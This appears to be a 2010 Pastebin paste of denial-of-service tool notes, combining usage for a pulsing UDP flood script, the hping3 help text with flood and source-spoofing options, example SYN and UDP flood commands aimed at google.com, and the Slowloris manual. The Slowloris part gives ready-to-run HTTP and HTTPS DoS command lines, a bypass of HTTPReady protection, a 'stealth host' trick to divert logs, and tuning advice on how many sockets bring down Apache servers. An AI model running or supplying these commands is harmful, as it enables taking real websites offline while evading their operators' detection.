SHARE
TWEET

Untitled

a guest Dec 9th, 2010 4,345 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. perl slowloris.pl
  2.      mt_pulse.pl
  3.  
  4. SIMPLE PULSING UDP FLOOD
  5. USAGE:  ./mt_pulse.pl A B
  6.          A: KBPS to pulse (set to your upstream for best result)
  7.          B: Target host or IP. (eg. radicalsroar.com OR 127.0.0.1)
  8.  
  9.  
  10. cd pentbox
  11. ruby pentbox.rb
  12. cd hydra/
  13. cd nikto/nikto.pl
  14. hping3
  15.  
  16. Usage
  17. Regardless of which Hping you get, the command to flood a target is as follows:
  18. hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
  19. You can read the manpage for hping by typing
  20. man hping[2 or 3]
  21. Or you can invoke help menu with the --help arg
  22. root@thegame:~# hping3 --help
  23. usage: hping3 host [options]
  24.   -h  --help      show this help
  25.   -v  --version   show version
  26.   -c  --count     packet count
  27.   -i  --interval  wait (uX for X microseconds, for example -i u1000)
  28.       --fast      alias for -i u10000 (10 packets for second)
  29.       --faster    alias for -i u1000 (100 packets for second)
  30.       --flood      sent packets as fast as possible. Don't show replies.
  31.   -n  --numeric   numeric output
  32.   -q  --quiet     quiet
  33.   -I  --interface interface name (otherwise default routing interface)
  34.   -V  --verbose   verbose mode
  35.   -D  --debug     debugging info
  36.   -z  --bind      bind ctrl+z to ttl           (default to dst port)
  37.   -Z  --unbind    unbind ctrl+z
  38.       --beep      beep for every matching packet received
  39. Mode
  40.   default mode     TCP
  41.   -0  --rawip      RAW IP mode
  42.   -1  --icmp       ICMP mode
  43.   -2  --udp        UDP mode
  44.   -8  --scan       SCAN mode.
  45.                    Example: hping --scan 1-30,70-90 -S www.target.host
  46.   -9  --listen     listen mode
  47. IP
  48.   -a  --spoof      spoof source address
  49.   --rand-dest      random destionation address mode. see the man.
  50.   --rand-source    random source address mode. see the man.
  51.   -t  --ttl        ttl (default 64)
  52.   -N  --id         id (default random)
  53.   -W  --winid      use win* id byte ordering
  54.   -r  --rel        relativize id field          (to estimate host traffic)
  55.   -f  --frag       split packets in more frag.  (may pass weak acl)
  56.   -x  --morefrag   set more fragments flag
  57.   -y  --dontfrag   set dont fragment flag
  58.   -g  --fragoff    set the fragment offset
  59.   -m  --mtu        set virtual mtu, implies --frag if packet size > mtu
  60.   -o  --tos        type of service (default 0x00), try --tos help
  61.   -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  62.   --lsrr           loose source routing and record route
  63.   --ssrr           strict source routing and record route
  64.   -H  --ipproto    set the IP protocol field, only in RAW IP mode
  65. ICMP
  66.   -C  --icmptype   icmp type (default echo request)
  67.   -K  --icmpcode   icmp code (default 0)
  68.       --force-icmp send all icmp types (default send only supported types)
  69.       --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
  70.       --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
  71.       --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
  72.       --icmp-help  display help for others icmp options
  73. UDP/TCP
  74.   -s  --baseport   base source port             (default random)
  75.   -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec
  76.   -k  --keep       keep still source port
  77.   -w  --win        winsize (default 64)
  78.   -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  79.   -Q  --seqnum     shows only tcp sequence number
  80.   -b  --badcksum   (try to) send packets with a bad IP checksum
  81.                    many systems will fix the IP checksum sending the packet
  82.                    so you'll get bad UDP/TCP checksum instead.
  83.   -M  --setseq     set TCP sequence number
  84.   -L  --setack     set TCP ack
  85.   -F  --fin        set FIN flag
  86.   -S  --syn        set SYN flag
  87.   -R  --rst        set RST flag
  88.   -P  --push       set PUSH flag
  89.   -A  --ack        set ACK flag
  90.   -U  --urg        set URG flag
  91.   -X  --xmas       set X unused flag (0x40)
  92.   -Y  --ymas       set Y unused flag (0x80)
  93.   --tcpexitcode    use last tcp->th_flags as exit code
  94.   --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
  95. Common
  96.   -d  --data       data size                    (default is 0)
  97.   -E  --file       data from file
  98.   -e  --sign       add 'signature'
  99.   -j  --dump       dump packets in hex
  100.   -J  --print      dump printable characters
  101.   -B  --safe       enable 'safe' protocol
  102.   -u  --end        tell you when --file reached EOF and prevent rewind
  103.   -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  104.   --tr-stop        Exit when receive the first not ICMP in traceroute mode
  105.   --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  106.   --tr-no-rtt       Don't calculate/show RTT information in traceroute mode
  107. ARS packet description (new, unstable)
  108.   --apd-send       Send the packet described with APD (see docs/APD.txt)
  109. Examples
  110. SYN flood google.com's port 80
  111. hping2 google.com -p 80 -i u30000 -S
  112. UDP flood google.com:
  113. hping3 google.com -p 80 -i u30000 --udp
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120. slowloris
  121. Perl slowloris.pl
  122.  If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
  123.  
  124.        Testing Example:
  125.  
  126.        ./slowloris.pl -dns www.example.com -port 80 -test
  127.  
  128.        This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for.  If you
  129.        really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that
  130.        unless you know what you're doing).
  131.  
  132.    HTTP DoS
  133.        Once you find a timeout window, you can tune Slowloris to use certain timeout windows.  For instance, if you know
  134.        that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the
  135.        timeout window 2000 seconds and increase the TCP timeout to 5 seconds.  The following example uses 500 sockets.
  136.        Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration.
  137.        Some are less than 300.  The smaller the timeout the faster you will consume all the available resources as other
  138.        sockets that are in use become available - this would be solved by threading, but that's for a future revision.
  139.        The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries
  140.        (and associated bandwidth) that Slowloris will make to be successful.  Slowloris has no way to identify if it's
  141.        successful or not though.
  142.  
  143.        HTTP DoS Example:
  144.  
  145.        ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
  146.  
  147.    HTTPReady Bypass
  148.        HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a
  149.        POST verses a GET or HEAD request with the -httpready switch.
  150.  
  151.        HTTPReady Bypass Example
  152.  
  153.        ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
  154.  If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a
  155.        seperate virtual host using the -shost variable.  This way the logs that are created will go to a different
  156.        virtual host log file, but only if they are kept separately.
  157.  
  158.        Stealth Host DoS Example:
  159.  
  160.        ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
  161.  
  162.    HTTPS DoS
  163.        Slowloris does support SSL/TLS on an experimental basis with the -https switch.  The usefulness of this particular
  164.        option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few
  165.        tests I performed during the early phases of development.  Your mileage may vary.
  166.  
  167.        HTTPS DoS Example:
  168.  
  169.        ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
  170.  
  171.    HTTP Cache
  172.        Slowloris does support cache avoidance on an experimental basis with the -cache switch.  Some caching servers may
  173.        look at the request path part of the header, but by sending different requests each time you can abuse more
  174.        resources.  The usefulness of this particular option has not been thoroughly tested.  Your mileage may vary.
  175.  
  176.        HTTP Cache Example:
  177.  
  178.        ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
  179.  
  180. Issues
  181.        Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar
  182.        devices, in it's current incarnation.  They may be ways around this, but not in this version at this time.  Most
  183.        likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted,
  184.        although only Netscalar has been tested.
  185.  
  186.        Slowloris isn't completely quiet either, because it can't be.  Firstly, it does send out quite a few packets
  187.        (although far far less than a typical GET request flooder).  So it's not invisible if the traffic to the site is
  188.        typically fairly low.  On higher traffic sites it will unlikely that it is noticed in the log files - although you
  189.        may have trouble taking down a larger site with just one machine, depending on their architecture.
  190.      For some reason Slowloris works way better if run from a *Nix box than from Windows.  I would guess that it's
  191.        probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small
  192.        number.  If you find that you can't open any more ports than ~130 or so on any server you test - you're probably
  193.        running into this "feature" of modern operating systems.  Either way, this program seems to work best if run from
  194.        FreeBSD.
  195.  
  196.        Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the
  197.        web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors.  So while the sockets
  198.        remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up
  199.        next to one another.  You will probably be easy to find if anyone is looking at their logs at that point -
  200.        although the DoS will be over by that point too.
  201.  
  202. What is a slow loris?
  203.        What exactly is a slow loris?  It's an extremely cute but endangered mammal that happens to also be poisonous.
  204.        Check this out:
  205.  
  206.        http://www.youtube.com/watch?v=rLdQ3UhLoD4
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top